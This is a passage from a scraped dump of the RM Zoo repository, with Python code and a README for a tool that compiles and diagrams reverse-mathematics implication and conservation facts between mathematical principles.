notImplies\n implies, notImplies = database['implication']\n \n global conservative, nonConservative\n conservative, nonConservative = database['conservation']\n \n global form\n form = database['form']\n \n global primary, primaryIndex\n primary, primaryIndex = database['primary']\n \n global justify\n justify = database['justify']\n \n global justComplexity\n justComplexity = {}\n def rebuildComplexity(fact):\n try:\n return justComplexity[fact]\n except KeyError:\n r = 1\n \n a,op,b = fact\n if op != u'form':\n jst = justify[fact]\n if not isString(jst):\n r += sum(rebuildComplexity(f) for f in jst)\n \n justComplexity[fact] = r\n return r\n for fact in justify:\n rebuildComplexity(fact)\n\ndef dumpDatabase(databaseName, quiet=False):\n if not quiet: eprint(u'Facts known: {0:,d}\\n'.format(len(justify)))\n \n start = timekeeper()\n if not quiet: eprint(u'Dumping updated database to binary file...')\n with open(databaseName, mode='wb') as databaseFile:\n pickledDatabase = pickle.dumps(getDatabase(), protocol=2)\n compressedDatabase = zlib.compress(pickledDatabase)\n databaseFile.write(compressedDatabase)\n \n if not quiet: eprint(u'Elapsed: {0:.6f} s\\n'.format(timekeeper() - start))\n\ndef loadDatabase(databaseName, quiet=False):\n with open(databaseName, mode='rb') as databaseFile:\n compressedDatabase = databaseFile.read()\n pickledDatabase = zlib.decompress(compressedDatabase)\n setDatabase(pickle.loads(pickledDatabase))\n\nfrom optparse import OptionParser, OptionGroup\ndef main():\n absoluteStart = timekeeper()\n eprint(u'\\nRM Zoo (v{0})\\n'.format(Version))\n \n parser = OptionParser(u'Usage: %prog [options] results [database_title]', version=u'%prog {0} ({1})'.format(Version, Date))\n \n parser.set_defaults(quiet=False, verbose=False)\n \n parser.add_option('-q', action='store_true', dest='quiet',\n help = u'Suppress progress/timing indicators.')\n parser.add_option('-v', action='store_true', dest='verbose',\n help = u'Report additional execution information.')\n \n (options, args) = parser.parse_args()\n if len(args)>2:\n parser.error(u'Too many arguments provided.')\n if len(args)<1:\n parser.error(u'No results file specified.')\n \n if options.quiet and options.verbose:\n parser.error(u'Options -q and -v are incompatible.')\n \n import os\n resultsFile = args[0]\n if len(args) > 1:\n databaseTitle = args[1]\n else:\n eprint(u'No database title specified; defaulting to \"database\".')\n databaseTitle = 'database.dat'\n \n if os.path.splitext(databaseTitle)[1] == '':\n databaseName = databaseTitle + os.extsep + 'dat'\n else:\n databaseName = databaseTitle\n \n if not os.path.exists(resultsFile):\n parser.error(u'Results file \"{0}\" does not exist.'.format(resultsFile))\n \n with open(resultsFile, encoding='utf-8') as f:\n parseResults(f.read(), options.quiet)\n deriveInferences(quiet=options.quiet, verbose=options.verbose)\n dumpDatabase(databaseName, options.quiet)\n if not options.quiet: eprint(u'Total elapsed time: {0:.6f} s'.format(timekeeper() - absoluteStart))\n \n if options.verbose:\n try:\n report = []\n report.append(u'\\tReduction.list: {0}'.format(Reduction.list.cache_info()))\n report.append(u'\\tForm.list: {0}'.format(Form.list.cache_info()))\n eprint(u'\\nCache report: ')\n eprint('\\n'.join(report))\n except AttributeError:\n pass\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7473697662353516, "alphanum_fraction": 0.7594210505485535, "avg_line_length": 65.4533920288086, "blob_id": "1cf2369b1b4ad89c9717427958048614fd84cece", "content_id": "d467ef2c86ff064ef2017929c7c4ec909ab8e198", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15688, "license_type": "permissive", "max_line_length": 642, "num_lines": 236, "path": "/README.md", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "# RM Zoo\n\nThe Reverse Mathematics Zoo is a program to help organize relations among various mathematical principles, particularly those that fail to be equivalent to any of the big five subsystems of second-order arithmetic. Its primary goal is to make it easier to see known results and open questions, and thus hopefully to serve as a useful tool to researchers in the field. As a secondary goal, the Zoo should provide an interactive annotated bibliography of the field, collecting results in a standard machine-readable format.\n\nThe present version of the RM Zoo is a complete rewrite of the original, and features many improvements. The program has been heavily optimized and extended; the run time should generally be faster, and more true facts should be inferred from most starting results files. In addition, the RM Zoo can now handle implications, reducibilities (including both Weihrauch reducibility and computable reducibility), and conservation facts.\n\nThe program is divided into two parts: a database updater/compiler, which derives all inferences from the provided results file, and a database query system, which can answer specific questions about reverse-mathematical relations or produce diagrams on request.\n\nUnder the reverse-mathematical interface, the Zoo is actually a specialized inference engine, designed to reason with facts of the form \"a implies b in context Q\" (implication facts), \"if a implies p, and p has form F, then b implies p\" (conservation facts), or the negations thereof.\n\n## Installation\n\nTo run the RM Zoo, you will need to install a distribution of Python, version 2.7 or later. (The Zoo will perform best if run in either [PyPy2.7](http://pypy.org/index.html) or [Python 3.4+](https://www.python.org/).)\n\nYou will also need the [Pyparsing](http://pyparsing.wikispaces.com/) module.\n\nIf not using Python 3.4+, you will need to install the [enum34](https://bitbucket.org/stoneleaf/enum34) module, and if not using Python 3.2+, you will also need the [repoze.lru](https://github.com/repoze/repoze.lru) module.\n\nTo install each of these modules, run the appropriate commands below:\n```\npip install pyparsing\npip install enum34\npip install repoze.lru\n```\n\nTo view/render the diagrams produced by the Zoo, you will need to install [Graphviz](http://www.graphviz.org/), or another program capable of reading DOT files.\n\n## Usage\n\nThe RM Zoo consists of two Python scripts, `rmupdater.py` and `rmzoo.py`.\n\n### rmupdater\n\n`rmupdater.py` compiles results files into databases of known facts, and is typically run as follows:\n\n- `python rmupdater.py [results file]`,\n\nwhere `[results file]` is a text file containing facts; the results file included in this distribution is `byPaper.txt`. If using multiple results files (for testing purposes), you may keep them in separate databases by adding a database title:\n\n- `python rmupdater.py [results file] [database title]`\n\nFor example, one would typically run\n\n- `python rmupdater.py byPaper.txt`;\n\nIf maintaining an alternate results file in `test.txt`, one might separately run the command\n\n- `python rmupdater.py test.txt testDatabase`.\n\n### rmzoo\n\n`rmzoo.py` then takes the database built by `rmupdater.py`, and carries out various tasks as controlled by its options. The basic command is\n\n- `python rmzoo.py [options]`;\n\nhowever, if you need to specify a database title, add it to the command as follows:\n\n- `python rmzoo.py [database title] [options]`\n\n---\n\nTo query the database for a fact (which will determine whether it is known or contradicted, and give the justification in either case), run the command\n\n- `python rmzoo.py -q \"[fact]\"`.\n\nFor example,\n\n- `python rmzoo.py -q \"RT22 -> CRT22\"`\n\nwill print a justification of the fact that **RT<sup>2</sup><sub>2</sub>** implies **CRT<sup>2</sup><sub>2</sub>** over **RCA<sub>0</sub>**.\n\n---\n\nTo generate a diagram from the database, instead run\n\n- `python rmzoo.py [diagram options] > [destination]`,\n\nwhere `[destination]` is a DOT file. The `[diagram options]` **must** include one or more of the following:\n\n- `-i`: show implications as black arrows;\n- `-n`: show non-implications as red arrows;\n- `-f`: color-codes principles by their syntactic form; currently, this uses a pink box for Π<sup>1</sup><sub>1</sub> principles, and a cyan box for restricted Π<sup>1</sup><sub>2</sub> principles. Other forms do not yet have a color code.\n- `-c`: show conservation facts, using color-coded arrows (as for the forms) to represent each form of conservation;\n- `-w`: show the weakest open implications as green arrows;\n- `-s`: show the strongest open implications as green arrows.\nIn addition, the options may include any of the following:\n- `-o`: show facts that hold in ω-models;\n- `-t [REDUCIBILITY]`: show facts relative to implications over the given REDUCIBILITY (options include sW, W, gW, sc, c, w, and RCA);\n- `-p`: show only one primary principle from each group of equivalent principles;\n- `-r \"[CLASS]\"`: restrict the diagram to just the principles contained between the quotation marks (and any sub-principles of conjunctions in the list). For example, the option `-r \"RT22 COH+WKL SRT22 RCA\"` will show only relations between the principles **RT22**, **COH+WKL**, **SRT22**, **RCA<sub>0</sub>**, **COH**, and **WKL**.\n\nFor instance,\n\n- `python rmzoo.py -i -o -w > diagram.dot`\n\nwill produce a diagram of all implications between principles that hold in ω-models, along with the weakest open implications (in ω-models). Generally speaking, the more options that are selected, the more information is shown on the diagram; this tends to make it harder to read.\n\nIt would probably be of very limited use to select *all* the options, for instance.\n\n## Credits\n\nThe RM Zoo was originally developed by Damir Dzhafarov, inspired by Joseph S. Miller's command-line version of the Computability Menagerie. Recently, the Zoo has been largely rewritten by Eric Astor to improve performance, expand the library of available inference rules, and move to a more maintainable/upgradeable architecture.\n\nMany people have helped with the RM Zoo, by commenting on the code, contributing facts, suggesting new features, or just expressing their interest. Thanks in particular to David Belanger, Peter Cholak, Stephen Flood, Denis Hirschfeldt, Steffen Lempp, Joe Miller, Antonio Montalbán, Carl Mummert, Ludovic Patey, Sam Sanders, and Ted Slaman.\n\n## Contributing\n\nContributions and/or feedback are, of course, welcome! If you are comfortable working with GitHub, the best way to contribute is as follows:\n\n1. Fork the code.\n2. Create your feature branch: `git checkout -b my-new-feature`\n3. Commit your changes: `git commit -am 'Add some feature'`\n4. Push to the branch: `git push origin my-new-feature`\n5. Submit a pull request.\n\nOtherwise, don't hesitate to send an e-mail or other message.\n\n### Results\n\nThe results file is a simple text file containing relations between reverse-mathematical principles. This is then compiled by the Zoo's updater to create its database, which is then used by the Zoo to generate its various outputs (whether DOT files or text responses).\n\n#### Names\n\nPrinciples should be named by **simple plaintext alphanumeric strings** that resemble their normal acronyms in the literature; for example, we use `RT22` for Ramsey's theorem for pairs (and 2 colors). Do not use TeX in the names of principles (as in `RT^2_2` or `\\mathsf{RT}^2_2`); this will make the diagrams harder to read, as DOT files have no TeX support, and can sometimes cause errors.\n\n#### Relations\n\nRelations between principles are given by using various operators. For instance:\n\n- `RT22 -> COH`\n\nindicates an **implication** provable in **RCA<sub>0</sub>**. By itself, however, this would generate an error; all facts must include a **justification**. To justify this fact, one would instead write:\n\n- `RT22 -> COH \"Mileti (2004) [Claim A.1.3], and independently Jockusch and Lempp\"`\n\nThese justifications are used by the Zoo to keep track of why the facts it derives are true, and as such are important for maintaining a usable database. For simplicity, justifications should also be plaintext; if a principle needs to be mentioned, the same acronyms as for relations should be used. To keep the results file clean, please use the justification format: \"Author 1, Author 2, and Author 3 (year) \\[result citation\\]\". If possible, citations should be to the authoritative published version of the paper, falling back to an arXiv citation only when the authoritative version is not yet available.\n\n**Non-implications** (i.e., implications known *not* to be provable in **RCA<sub>0</sub>**), can be entered similarly, using the operator `-|>`; for example,\n\n- `RT22+WKL -|> ACA \"Seetapun and Slaman (1995) [Theorem 3.1]\"`\n\nHowever, this result said more than this; Seetapun and Slaman specifically constructed an omega-model of **RT22+WKL** in which **ACA** failed. In general, one can represent implications and non-implications over omega-models by prepending `w` before an operator. Thus, one can more accurately write the previous result as\n\n- `RT22+WKL w-|> ACA \"Seetapun and Slaman (1995) [Theorem 3.1]\"`\n\nand might also write\n\n- `COH w-> StCOH \"Hirschfeldt and Shore (2007) [Proposition 4.4]\"`\n\nto represent this implication which, while not necessarily true in all models of **RCA<sub>0</sub>**, holds over all omega models. The Zoo is programmed to understand that `->` is stronger than `w->`, and thus that `w-|>` is stronger than `-|>`.\n\nFurthermore, the Zoo now supports results from the study of computable and Weihrauch reducibilities, using the operators `<=` and `</=`, and appending an abbreviation of the relevant reducibility. For example, the following facts could be included in the results file:\n\n- `DNR <=_c SRT22 \"Hirschfeldt, Jockusch, Kjos-Hanssen, Lempp, and Slaman (2008) [follows from proof of Theorem 2.3]\"`\n- `COH </=_W SRT22 \"Dzhafarov (to appear) [Corollary 4.5]\"`\n\nThe supported reducibilities are:\n\n- strong Weihrauch reducibility (`sW`)\n- Weihrauch/uniform reducibility (`W`)\n- generalized Weihrauch reducibility (`gW`)\n- strong computable reducibility (`sc`)\n- computable reducibility (`c`)\n- generalized computable reducibility (`gc`) \\[also known as reducibility over omega-models (`w`)\\]\n\nThe Zoo understands the relations between these reducibilities, and between them and the above notions of implication. Thus, it can conclude from the above examples that `SRT22 w-> DNR` and that `COH </=_sW SRT22`.\n\n##### Equivalences and Primary Principles\n\nThe Zoo can handle cycles without difficulty. For example, it will know that the facts\n\n- `StCOH -> StCADS`\n- `StCADS -> StCOH`\n\ntogether indicate that the principles **StCOH** and **StCADS** are **equivalent** over **RCA<sub>0</sub>**, and will act accordingly. For instance, if rendering a diagram, the Zoo will pick one of the two principles to treat as 'primary', in the sense that implications and non-implications will only be shown going to and from the primary principle; this reduces the mess, and keeps the diagram more readable. Of course, the Zoo may occasionally pick the \"wrong\" primary principle; for instance, we probably want **StCOH** to be considered primary over **StCADS**. Since the Zoo has no way of knowing that on its own, we can include the fact\n\n- `StCOH is primary`\n\nin our results file, and ensure that the Zoo considers **StCOH** to be the primary principle. (Note that our choice of primary principles is given no justification; in fact, by the standards of the results file, it *cannot* be justified.) The order in which this is done matters. For example, if we switch to thinking about omega models, **StCOH** will be equivalent to **COH**, but we probably want **COH** to be considered primary in this case. Entering\n\n- `COH is primary`\n\n**earlier** (i.e., \"higher up\") in the results file will achieve the desired result.\n\nPrinciples can also be declared equivalent by use of dedicated operators, included for convenience. Writing\n\n- `StCOH <-> StCADS`\n\nwill produce the same result as including both of the two separate implications. (**Warning:** prepending a `w` to `<->` does work, but does not merely indicate an equivalence that holds over omega models; it in fact asserts that both halves of the implication hold in omega models. One can use the operator `<=>` in a similar way, subject to the same caveat.)\n\n#### Syntactic Forms and Conservation Facts\n\nThe Zoo also understands **syntactic forms** and **conservations facts** relating reverse-mathematical principles. Specifically, it understands the syntactic forms \n\n- `Sig02`, `Pi02`, `Sig03`, `Pi03`, `Sig04`, and `Pi04`: three levels of the arithmetic hierarchy\n- `Pi11`, `Pi12`, and `Pi13`: the first three universal levels of the analytic hierarchy\n- `uPi03`: Pi03 with a single universally-quantified set paramater; defined as \"twiddle-Pi<sup>0</sup><sub>3</sub>\" in Patey and Yokoyama (preprint)\n- `rPi12`: restricted Pi12 statements, as defined in Hirschfeldt and Shore (2007) \\[Corollary 2.21\\]\n\nWe can thus enter\n\n- `RT22 form rPi12`\n- `BSig2 form Pi11`\n\nto indicate that the given principles have the given forms. (Note that these statements are **unjustified**.)\n\nTo indicate that one principle is conservative over another for consequences of a given form (that is to say, the first proves no more consequences of that form than the second), we can add results such as:\n\n- `AMT+BSig2 Pi11c BSig2 \"Hirschfeldt, Shore, and Slaman (2009) [Corollary 4.5]\"`\n- `AMT rPi12c RCA \"Hirschfeldt, Shore, and Slaman (2009) [Corollary 3.15]\"`\n\nTo indicate that one principle is **not** conservative over another, prepend an `n` before the conservation operator. For instance, we might add the result\n\n- `RT22 nPi04c RCA \"Seetapun and Slaman (1995) [Theorem 3.6]\"`\n\nConservation and non-conservation facts must, again, be justified. The Zoo understands the connections between conservation facts and implications, and will use them to extract more relations between the known principles.\n\n#### Compound Principles (i.e., Conjunctions)\n\nAs the reader may have noted above, the Zoo also understands compound principles; that is, principles that are conjunctions of other principles. For instance, if we add\n\n- `SRT22+COH <-> RT22`\n\nas a fact in the results file, the Zoo will know that `COH+SRT22` is a compound principle, denoting the conjunction of `COH` and `SRT22`. It will add any component principles to its internal list, and automatically understands the relations between the compound principle and its components. \n\n#### Organization and Formatting\n\nPlease note that any line in the results file starting with a `#` symbol is ignored, and considered to be a comment for human readers.\n\nIf contributing to the results file, please take note of the organization formatting used therein; we have organized the results by publication, arranged by publication year when possible (with the noted exception of Simpson's \"Subsystems of Second-Order Arithmetic\" \\[also known as SOSOA\\], which is listed first). Each publication's results should be preceded by a comment containing a full authoritative citation, including (if at all possible) a URL and DOI for the authoritative published version.\n\nContributions to the results file are extremely welcome. For example, if anyone wants to transcribe the relevant results of Simpson's SOSOA into our format, the maintainers would be eternally grateful! (For context, please note that this textbook is over 450 pages long.)\n\n## License\n\nThe RM Zoo has been placed under the MIT license; in plain English, you can do whatever you want with it, including redistribution and creation of derivative works, as long as attribution and the appropriate license information remain. For details, please see the LICENSE file.\n" }, { "alpha_fraction": 0.646034836769104, "alphanum_fraction": 0.6479690670967102, "avg_line_length": 23.619047164916992, "blob_id": "3bfe288f065d124568ecf4d49c278c0f44593992", "content_id": "22029037e80654d6c4521d61f88c66db6114bbe5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 517, "license_type": "permissive", "max_line_length": 58, "num_lines": 21, "path": "/version_guard.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "import sys\nif sys.version_info >= (3,):\n def isString(value):\n return isinstance(value, str)\nelse:\n def isString(value):\n return isinstance(value, basestring)\n\n# Mock \"lru_cache\"; actually just a pass-through decorator\ndef lru_cache(*args, **kwargs):\n def empty_decorator(f):\n f.__wrapped__ = f\n return f\n return empty_decorator\ntry:\n from functools import lru_cache\nexcept ImportError:\n try:\n from repoze.lru import lru_cache\n except ImportError:\n pass\n" }, { "alpha_fraction": 0.5370121002197266, "alphanum_fraction": 0.5464333891868591, "avg_line_length": 29.547945022583008, "blob_id": "12fe5e561a010a6eba832e3f356246f2d1ec5fcf", "content_id": "538c4cf08ad4caf414f75f808f6e47bb9254728a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2229, "license_type": "permissive", "max_line_length": 142, "num_lines": 73, "path": "/renderJustification.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "from __future__ import print_function, unicode_literals\n\nfrom rmBitmasks import Form, Reduction\n\nfrom version_guard import lru_cache, isString\n\n_justLineMarker = u'*'\n_justIndentMarker = u'@'\njustMarker = _justLineMarker + _justIndentMarker\n_justIndented = justMarker + _justIndentMarker\n_justFormat = justMarker + u'{0}: '\ndef indentJust(jst):\n return jst.replace(justMarker, _justIndented)\n\n@lru_cache(maxsize=1024)\ndef printOp(op):\n if isString(op):\n return op\n \n opCtx, opCore = op\n try:\n opCtx = opCtx.name\n except AttributeError:\n pass\n \n if opCore == u'nc':\n return u'n{0}c'.format(opCtx)\n elif opCore in (u'=>', u'=/>', u'<=', u'</=', u'<=>'):\n return u'{1}_{0}'.format(opCtx, opCore)\n else:\n return u'{0}{1}'.format(opCtx, opCore)\n\ndef printFact(a, op, b):\n if op == u'form':\n b = b.name\n elif op[0] in (Reduction.sW, Reduction.W, Reduction.gW, Reduction.sc, Reduction.c): # Reducibility fact, not implication fact\n if op[1] == u'->':\n op = (op[0], u'<=')\n a,b = b,a\n elif op[1] == u'-|>':\n op = (op[0], u'</=')\n a,b = b,a\n elif op[1] == u'<->':\n op = (op[0], u'<=>')\n return u'{0} {1} {2}'.format(a, printOp(op), b)\n\nprintedJustify = {}\ndef printJustification(fact, justify, formatted=True):\n a,op,b = fact\n \n r = ''\n try:\n r = printedJustify[fact]\n except KeyError:\n if op == u'form':\n r = justMarker + printFact(*fact)\n else:\n try:\n jst = justify[fact]\n except KeyError:\n raise Exception(u'ERROR: Referenced fact \"{0}\" not justified!'.format(printFact(*fact)))\n \n if isString(jst):\n r = _justFormat.format(printFact(*fact)) + jst\n else:\n r = _justFormat.format(printFact(*fact)) \\\n + u''.join((_justIndented+f if isString(f) else indentJust(printJustification(f, justify, formatted=False))) for f in jst)\n printedJustify[fact] = r\n \n if formatted:\n return r.replace(_justLineMarker, u'\\n').replace(_justIndentMarker, u' ')\n else:\n return r" }, { "alpha_fraction": 0.5372593998908997, "alphanum_fraction": 0.5396416783332825, "avg_line_length": 34.452701568603516, "blob_id": "59479c7df654fcb04ccbd8b5a8e71c3161562d12", "content_id": "b590282d37e7551ec5229b985e54b79f73be13e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10494, "license_type": "permissive", "max_line_length": 128, "num_lines": 296, "path": "/databaseToJSON.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os, sys, uuid\n\nimport itertools\nfrom io import open\nfrom collections import defaultdict\n\nfrom version_guard import isString\n\nimport zlib\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ntry:\n import ujson as json\nexcept:\n print('UltraJSON not available; falling back to Python library.')\n import json\n\nfrom rmBitmasks import *\nfrom renderJustification import printOp\n\nVersion = u'5.1'\nDatabaseVersion = u'5.1'\n\nclass VersionError(Exception):\n def __init__(self, targetVersion, actualVersion):\n super(VersionError, self).__init__(u'Version mismatch: found v{0}, targeting v{1}'.format(actualVersion, targetVersion))\n\nclass Zoo:\n _nextUID = 0\n \n nodes = {}\n meta = {'edgeKinds': [],\n 'colorings': [],\n 'graphviz': {}}\n \n def addNode(label, definition='', key=None, uid=None, edges={}, properties={}, tags=[]):\n if uid is None:\n uid = _nextUID\n _nextUID += 1\n \n n = Node(uid, label, definition, key, edges, properties, tags)\n if key is None:\n nodes[label] = n\n else:\n nodes[key] = n\n \n def addEdgeKind(label, functionBody):\n self.meta['edgeKinds'].append({'label': label, 'functionBody': functionBody})\n \n def addColoring(self, name, colors, labels, coloringFunction):\n self.meta['colorings'].append(Coloring(name, colors, labels, coloringFunction))\n \n def __getitem__(self, key):\n return self.nodes[key]\n \n def __setitem__(self, key, item):\n self.nodes[key] = item\n \n def __contains__(self, key):\n return (key in self.nodes)\n \n def __init__(self, edgeKinds=[], rankdir='TB'):\n self.meta['edgeKinds'] = edgeKinds\n self.meta['graphviz'] = {'rankdir': rankdir}\n\nclass Coloring:\n def __init__(self, name, colors, labels, coloringFunction):\n self.label = name\n self.colors = [{'color': color, 'label': label} for color,label in zip(colors,labels)]\n self.coloring = coloringFunction\n\nclass Node:\n def __init__(self, uid, label, definition='', key=None, edges={}, properties={}, tags=[]):\n if key is None:\n key = label\n \n self.uid = uid\n self.label = label\n self.definition = definition\n self.key = key\n self.edges = edges\n self.properties = properties\n self.tags = tags\n \n def addEdge(self, dstKey, properties={}):\n self.edges[dstKey] = Edge(self.key, dstKey, properties)\n \n def addProperty(self, name, justification, value=None, description='', uid=None):\n self.properties[name] = Property(justification, value, description, uid)\n\nclass Edge:\n def __init__(self, srcKey, dstKey, properties={}):\n self.srcKey = srcKey\n self.dstKey = dstKey\n self.properties = properties\n \n def addProperty(self, name, justification, value=None, description='', uid=None):\n self.properties[name] = Property(justification, value, description, uid)\n\nclass Property:\n def __init__(self, justification, value=None, description='', uid=None):\n if uid is None:\n uid = uuid.uuid4()\n \n self.value = value\n self.justification = justification\n self.description = description\n self.uid = uid\n\nclass Justification:\n weight = 0\n direct = None\n composite = None\n \n def __init__(self, direct=None, composite=None, weight=None):\n if direct is None and composite is None:\n raise ValueError('Justifications must contain some justification.')\n if direct is not None and composite is not None:\n raise ValueError('Justifications are either direct or composite, not both.')\n \n if direct is not None:\n self.weight = 1\n self.direct = direct\n \n if composite is not None:\n if weight is None:\n raise ValueError('Composite justifications must specify their weights.')\n \n self.weight = weight\n self.composite = composite\n \ndef loadDatabase(databaseName, quiet=False):\n with open(databaseName, mode='rb') as databaseFile:\n compressedDatabase = databaseFile.read()\n pickledDatabase = zlib.decompress(compressedDatabase)\n setDatabase(pickle.loads(pickledDatabase))\n\ndef getDatabase():\n return {'version': DatabaseVersion,\n 'principles': principles,\n 'implication': (implies, notImplies),\n 'conservation': (conservative, nonConservative),\n 'form': form,\n 'primary': (primary, primaryIndex),\n 'justify': justify}\ndef setDatabase(database):\n if database['version'] != DatabaseVersion:\n raise VersionError(DatabaseVersion, database['version'])\n \n global principles\n principles = database['principles']\n \n global implies, notImplies\n implies, notImplies = database['implication']\n \n global conservative, nonConservative\n conservative, nonConservative = database['conservation']\n \n global form\n form = database['form']\n \n global primary, primaryIndex\n primary, primaryIndex = database['primary']\n \n global justify\n justify = database['justify']\n\nif __name__ == '__main__':\n databaseTitle = 'database'\n if os.path.splitext(databaseTitle)[1] == '':\n databaseName = databaseTitle + os.extsep + 'dat'\n else:\n databaseName = databaseTitle\n loadDatabase(databaseName)\n \n primaryIndex += sorted(principles - primary)\n \n meta = {\n 'tags': [],\n 'edgeKinds': [],\n 'colorings': [],\n 'about': {'description': 'The <a href=\"https://rmzoo.math.uconn.edu/\">RM Zoo</a> is a program to '\n 'help organize reverse-mathematical relations between mathematical '\n 'principles, particularly those that fail to be equivalent to any of the '\n 'big five subsystems of second-order arithmetic. Its primary goal is to '\n 'make it easier to see known results and open questions, and thus '\n 'hopefully to serve as a useful tool to researchers in the field. As a '\n 'secondary goal, the Zoo provides an interactive annotated bibliography '\n 'of the field, collecting results in a standard machine-readable format.'},\n 'graphviz': {}\n }\n\n translationFunction = \"if('{0}' in edge.properties) return 1; \" \\\n \"if('{1}' in edge.properties) return 0; \" \\\n \"return 2;\"\n for red in Reduction:\n if red == Reduction.none: continue\n \n posName = red.name + u'i'\n negName = red.name + u'ni'\n \n kindNode = {'label': '$\\rightarrow_{\\rm ' + red.name + '}$',\n 'key': posName,\n 'edges': [r.name + u'i' for r in Reduction.list(Reduction.weaker(red) & ~red)]}\n kind = {'label': '$\\rightarrow_{\\rm ' + red.name + '}$',\n 'functionBody': translationFunction.format(posName, negName),\n 'node': kindNode}\n meta['edgeKinds'].append(kind)\n for f in Form:\n if f == Form.none: continue\n \n posName = f.name + u'c'\n negName = f.name + u'nc'\n \n #TODO: Implement better labels for conservation results\n kindNode = {'label': posName,\n 'key': posName,\n 'edges': [r.name + u'i' for r in Reduction.list(Reduction.weaker(red) & ~red)]}\n kind = {'label': posName,\n 'functionBody': translationFunction.format(posName, negName),\n 'node': kindNode}\n \n nodes = {}\n for i,p in enumerate(primaryIndex):\n nodes[p] = dict()\n nodes[p]['uid'] = i\n \n #TODO: Implement labels\n nodes[p]['label'] = p\n \n #TODO: Implement definitions\n nodes[p]['definition'] = ''\n \n nodes[p]['edges'] = {dst:{'srcKey':p,\n 'dstKey':dst,\n 'properties':dict()} for dst in principles}\n nodes[p]['properties'] = {}\n nodes[p]['tags'] = []\n uid = i+1\n \n properties = {}\n for p in sorted(principles):\n for f in Form.list(form[p]):\n #TODO: Implement justifications for forms\n properties[(p, u'form', f)] = {'uid': uid,\n 'value': f.name,\n 'justification': {'weight': 1,\n 'direct': 'Observed'}}\n nodes[p]['properties'][f.name] = properties[(p, u'form', f)]\n uid += 1\n \n for f,j in justify.items():\n if f in properties:\n continue\n \n toJustify = [(f, j, {'uid': uid})]\n uid += 1\n while toJustify:\n fact,jst,prop = toJustify.pop()\n done = True\n if isString(jst):\n prop['justification'] = {'weight': 1, 'direct': jst}\n elif all(ref in properties for ref in jst):\n prop['justification'] = {'weight': 1 + sum(properties[ref]['justification']['weight'] for ref in jst),\n 'composite': [properties[ref]['uid'] for ref in jst]}\n else:\n done = False\n toJustify.append((fact, jst, prop))\n for ref in jst:\n if ref in properties:\n continue\n toJustify.append((ref, justify[ref], {'uid': uid}))\n uid += 1\n if done:\n properties[fact] = prop\n \n a,op,b = fact\n opCtx,opCore = op\n if opCore in u'->':\n coreName = u'i'\n elif opCore == u'-|>':\n coreName = u'ni'\n else:\n coreName = opCore\n opName = opCtx.name + coreName\n nodes[a]['edges'][b]['properties'][opName] = prop\n \n with open('rmzoo.json', 'w') as f:\n json.dump({'nodes': nodes, 'meta': meta}, f, sort_keys=True, indent=4)\n" }, { "alpha_fraction": 0.5344477295875549, "alphanum_fraction": 0.582109808921814, "avg_line_length": 27.203821182250977, "blob_id": "b6640429366d2e8fe0cc55fc769966c480cf88f6", "content_id": "df33faa03cc34755f595249b69e70f15ac91f3a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4427, "license_type": "permissive", "max_line_length": 98, "num_lines": 157, "path": "/rmBitmasks.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "from __future__ import print_function, unicode_literals\n\nfrom enum import Enum\n\nfrom version_guard import lru_cache\n\nclass BitmaskEnum(int, Enum):\n def __new__(cls, value=None):\n if value is None:\n if len(cls.__members__) == 0:\n value = 0\n else:\n value = 1 << (len(cls.__members__) - 1)\n \n obj = int.__new__(cls, value)\n obj._value_ = value\n return obj\n \n @staticmethod\n def isPresent(x,magic_num):\n return (x & magic_num) != 0\n \n @classmethod\n @lru_cache(maxsize=256)\n def strongest(cls,magic_num):\n if magic_num == 0:\n return cls(0)\n else:\n return cls(1 << (magic_num.bit_length() - 1))\n \n @classmethod\n @lru_cache(maxsize=256)\n def weakest(cls,magic_num):\n if magic_num == 0:\n return cls.none\n else:\n return cls(magic_num & -magic_num)\n \n @classmethod\n @lru_cache(maxsize=256)\n def list(cls,magic_num):\n return [x for x in cls if cls.isPresent(x, magic_num)]\n \n @classmethod\n def fromString(cls,s):\n try:\n return getattr(cls, s)\n except AttributeError:\n raise NotImplementedError(\"The {0} `{1}` is not implemented.\".format(cls.__name__, s))\n\nclass Reduction(BitmaskEnum):\n none = 0\n w = 1 << 0\n RCA = 1 << 1\n c = 1 << 2\n sc = 1 << 3\n gW = 1 << 4\n W = 1 << 5\n sW = 1 << 6\n \n @classmethod\n def fromString(cls,s):\n try:\n return cls.alias[s]\n except KeyError:\n try:\n return getattr(cls, s)\n except AttributeError:\n raise NotImplementedError(\"The reduction `{}` is not implemented.\".format(s))\n\nReduction.alias = {u'': Reduction.RCA,\n u'gc': Reduction.w}\n\ndef noReduction():\n return Reduction.none\n\nclass Form(BitmaskEnum):\n none = 0\n Sig02 = 1 << 10\n Pi02 = 1 << 9\n Sig03 = 1 << 8\n Pi03 = 1 << 7\n uPi03 = 1 << 6\n Sig04 = 1 << 5\n Pi04 = 1 << 4\n Pi11 = 1 << 3\n rPi12 = 1 << 2\n Pi12 = 1 << 1\n Pi13 = 1 << 0\n\ndef noForm():\n return Form.none\n\ndef _completeImplications(enum, forward):\n for c in enum:\n if c == enum.none: continue\n for a in enum:\n if a == enum.none: continue\n \n if enum.isPresent(c, forward[a]):\n forward[a] |= forward[c]\n\ndef _reverseImplications(enum, forward):\n reverse = {enum.none: enum.none}\n for p0 in enum:\n if p0 == enum.none: continue\n \n reverse[p0] = enum.none\n for p1 in enum:\n if p1 == enum.none: continue\n \n if enum.isPresent(p0, forward[p1]):\n reverse[p0] |= p1\n return reverse\n\n_R_WEAKER = {r:r for r in Reduction}\n\n_R_WEAKER[Reduction.RCA] |= Reduction.w # 